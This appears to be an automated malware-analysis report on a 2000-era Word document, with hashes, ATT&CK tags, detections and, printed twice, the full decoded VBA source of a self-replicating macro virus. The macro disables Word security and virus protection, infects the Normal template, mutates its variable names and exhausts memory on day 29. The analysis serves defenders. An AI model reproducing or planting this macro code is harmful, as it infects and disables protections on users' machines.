Office (OLE) malware analysis — malicious · 8ce3f05a23700601

MALICIOUS

Office (OLE)

119.5 KB Created: 2000-07-03 22:00:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: 462415db2117fd00f54a482eed003a03 SHA-1: 829b78163e482eb3c10953f642cd55e02c7f8142 SHA-256: 8ce3f05a23700601827f97cdcc91ad4039e331f13e68bed71a320b3a847e0fb5

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing VBA macros. The Document_Open macro attempts to lower Word's security settings and inject code into the Normal template, likely to establish persistence. The ClamAV detection as 'Win.Trojan.Psycho-3' further supports its malicious nature. The macro attempts to write to the registry key HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security to disable virus protection.

Heuristics 3

ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Psycho-3
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3071 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3071 bytes
SHA-256: `fd9a018a69f770449c3223bfe960c08d746b91eaea72e7a376b5b9a8f1855791`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next mbopl1mbop = "M" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Options.VirusProtection = False Options.SaveNormalPrompt = False mbopfimbop = 7 Options.ConfirmConversions = False Set mbopNtmbop = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule Set mbopAdmbop = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule Set mbopTdmbop = ThisDocument.VBProject.VBComponents.Item(1).CodeModule mbopsembop = 5 mbopl2mbop = "b" mbopfnmbop = mbopfimbop & mbopsembop For mbopiimbop = 1 To mbopTdmbop.countoflines If InStr(mbopTdmbop.lines(mbopiimbop, 1), "Private Sub Document_Open()") <> 0 Then mbopSlmbop = mbopiimbop Exit For End If Next mbopl3mbop = "o" mbopVcmbop = Trim(mbopTdmbop.lines(mbopSlmbop, mbopSlmbop + mbopfnmbop)) mboplvmbop = 97 If mbopNtmbop.countoflines > 0 Then mbopNlmbop = mbopNtmbop.lines(1, mbopNtmbop.countoflines) If InStr(mbopNlmbop, "Nt") = 0 And InStr(mbopNlmbop, "Sl") = 0 And InStr(mbopNlmbop, "Nl") = 0 And InStr(mbopNlmbop, "Ad") = 0 And InStr(mbopNlmbop, "Vc") = 0 And InStr(mbopNlmbop, "Td") = 0 Then mbopNtmbop.addfromstring mbopVcmbop mbopinmbop = True End If Else mbopNtmbop.addfromstring mbopVcmbop mbopinmbop = True End If mbophvmbop = 122 If mbopAdmbop.countoflines > 0 Then mbopAlmbop = mbopAdmbop.lines(1, mbopAdmbop.countoflines) If InStr(mbopAlmbop, "Nt") = 0 And InStr(mbopAlmbop, "Sl") = 0 And InStr(mbopAlmbop, "Nl") = 0 And InStr(mbopAlmbop, "Ad") = 0 And InStr(mbopAlmbop, "Vc") = 0 And InStr(mbopAlmbop, "Td") = 0 Then mbopAdmbop.addfromstring mbopVcmbop mbopiambop = True End If Else mbopAdmbop.addfromstring mbopVcmbop mbopiambop = True End If mbopl4mbop = "p" For mbopiimbop = 1 To 15 Randomize mbopTnmbop = mbopTnmbop & Chr(Int((mbophvmbop - mboplvmbop + 1) * Rnd + mboplvmbop)) Next mbopd2mbop = 9 mbopVcmbop = mbopTdmbop.lines(1, mbopTdmbop.countoflines) mbopTdmbop.deletelines 1, mbopTdmbop.countoflines Do While InStr(mbopVcmbop, "mbop") <> 0 mbopVcmbop = Mid(mbopVcmbop, 1, InStr(mbopVcmbop, "mbop") - 1) & mbopTnmbop & Mid(mbopVcmbop, InStr(mbopVcmbop, "mbop") + Len("mbop")) Loop mbopTdmbop.addfromstring mbopVcmbop mbopDymbop = Day(Now) mbopd1mbop = 2 mbopl5mbop = "!" If mbopDymbop = mbopd1mbop & mbopd2mbop Then Dim mbopstmbop() mbopcambop = 0 Do ReDim Preserve mbopstmbop(mbopcambop) mbopqwmbop = CLng(1024) mbopqambop = mbopqwmbop mbopqzmbop = mbopqwmbop * mbopqambop mbopstmbop(mbopcambop) = String(mbopqzmbop, Right(mbopTnmbop, 1)) DoEvents mbopcambop = mbopcambop + 1 Loop End If If mbopiambop = True Or mbopinmbop = True Then MsgBox mbopl1mbop & mbopl2mbop & mbopl3mbop & mbopl4mbop & mbopl5mbop, vbCritical End If End Sub

SHA-256: fd9a018a69f770449c3223bfe960c08d746b91eaea72e7a376b5b9a8f1855791

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
mbopl1mbop = "M"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Options.VirusProtection = False
Options.SaveNormalPrompt = False
mbopfimbop = 7
Options.ConfirmConversions = False
Set mbopNtmbop = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
Set mbopAdmbop = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
Set mbopTdmbop = ThisDocument.VBProject.VBComponents.Item(1).CodeModule
mbopsembop = 5
mbopl2mbop = "b"
mbopfnmbop = mbopfimbop & mbopsembop
For mbopiimbop = 1 To mbopTdmbop.countoflines
If InStr(mbopTdmbop.lines(mbopiimbop, 1), "Private Sub Document_Open()") <> 0 Then
mbopSlmbop = mbopiimbop
Exit For
End If
Next
mbopl3mbop = "o"
mbopVcmbop = Trim(mbopTdmbop.lines(mbopSlmbop, mbopSlmbop + mbopfnmbop))
mboplvmbop = 97
If mbopNtmbop.countoflines > 0 Then
mbopNlmbop = mbopNtmbop.lines(1, mbopNtmbop.countoflines)
If InStr(mbopNlmbop, "Nt") = 0 And InStr(mbopNlmbop, "Sl") = 0 And InStr(mbopNlmbop, "Nl") = 0 And InStr(mbopNlmbop, "Ad") = 0 And InStr(mbopNlmbop, "Vc") = 0 And InStr(mbopNlmbop, "Td") = 0 Then
mbopNtmbop.addfromstring mbopVcmbop
mbopinmbop = True
End If
Else
mbopNtmbop.addfromstring mbopVcmbop
mbopinmbop = True
End If
mbophvmbop = 122
If mbopAdmbop.countoflines > 0 Then
mbopAlmbop = mbopAdmbop.lines(1, mbopAdmbop.countoflines)
If InStr(mbopAlmbop, "Nt") = 0 And InStr(mbopAlmbop, "Sl") = 0 And InStr(mbopAlmbop, "Nl") = 0 And InStr(mbopAlmbop, "Ad") = 0 And InStr(mbopAlmbop, "Vc") = 0 And InStr(mbopAlmbop, "Td") = 0 Then
mbopAdmbop.addfromstring mbopVcmbop
mbopiambop = True
End If
Else
mbopAdmbop.addfromstring mbopVcmbop
mbopiambop = True
End If
mbopl4mbop = "p"
For mbopiimbop = 1 To 15
Randomize
mbopTnmbop = mbopTnmbop & Chr(Int((mbophvmbop - mboplvmbop + 1) * Rnd + mboplvmbop))
Next
mbopd2mbop = 9
mbopVcmbop = mbopTdmbop.lines(1, mbopTdmbop.countoflines)
mbopTdmbop.deletelines 1, mbopTdmbop.countoflines
Do While InStr(mbopVcmbop, "mbop") <> 0
mbopVcmbop = Mid(mbopVcmbop, 1, InStr(mbopVcmbop, "mbop") - 1) & mbopTnmbop & Mid(mbopVcmbop, InStr(mbopVcmbop, "mbop") + Len("mbop"))
Loop
mbopTdmbop.addfromstring mbopVcmbop
mbopDymbop = Day(Now)
mbopd1mbop = 2
mbopl5mbop = "!"
If mbopDymbop = mbopd1mbop & mbopd2mbop Then
Dim mbopstmbop()
mbopcambop = 0
Do
ReDim Preserve mbopstmbop(mbopcambop)
mbopqwmbop = CLng(1024)
mbopqambop = mbopqwmbop
mbopqzmbop = mbopqwmbop * mbopqambop
mbopstmbop(mbopcambop) = String(mbopqzmbop, Right(mbopTnmbop, 1))
DoEvents
mbopcambop = mbopcambop + 1
Loop
End If
If mbopiambop = True Or mbopinmbop = True Then
MsgBox mbopl1mbop & mbopl2mbop & mbopl3mbop & mbopl4mbop & mbopl5mbop, vbCritical
End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.